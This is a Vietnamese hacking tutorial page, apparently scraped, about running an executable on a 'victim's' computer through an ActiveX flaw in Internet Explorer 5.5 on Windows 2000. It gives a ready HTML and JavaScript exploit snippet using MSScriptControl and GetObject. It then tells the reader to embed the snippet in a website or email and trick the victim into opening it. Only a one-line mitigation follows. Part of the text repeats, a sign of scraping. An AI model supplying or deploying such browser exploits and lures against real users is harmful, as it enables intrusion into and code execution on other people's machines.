Đang tải... (xem toàn văn)
Chạy file trên máy của victim
Chạy file trên máy của victim :trang này đã được đọc lần Giới thiệu : • Bạn đã cài được backdoor vào victim hay muốn chạy 1 file nào đó trên máy của victim ?• Trong khi visit website hay check mail thì bạn có thể chạy 1 file mà bạn biết , ví dụ : notepad.exe ngay trên Browser • Test trên IE 5.5 Windows 2000 • Bug này là bug của ActiveX object "MSScriptControl.ScriptControl" bạn có thể xem thêm nhiều điều ở trong : C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat. Tiến hành • Chắc chắn rằng victim dùng IE 5.5 Windows 2000 !!:) • Tạo một file .html có mã như sau : <html><h2>Noi dung website</h2><script>v=new ActiveXObject("MSScriptControl.ScriptControl.1");v.Language="VBScript";x=v.eval('GetObject("c:/ten_file_can_chay.exe(hay gi do')","htmlfile")');setTimeout("alert(x.body.outerHTML);",2000);</script></html> • Nhúng mã nguồn trên vào Website hay email, sau đó nhử cho victim kích hoạt • Ðể khắc phục bạn cần bỏ ActiveX đí hay tốt nhất là không dùng IE nữa (ý kiến hay) . Chạy file trên máy của victim :trang này đã được đọc lần Giới thiệu : • Bạn đã cài được backdoor vào victim hay muốn chạy 1 file nào đó trên máy của victim. mail thì bạn có thể chạy 1 file mà bạn biết , ví dụ : notepad.exe ngay trên Browser • Test trên IE 5.5 Windows 2000 • Bug này là bug của ActiveX object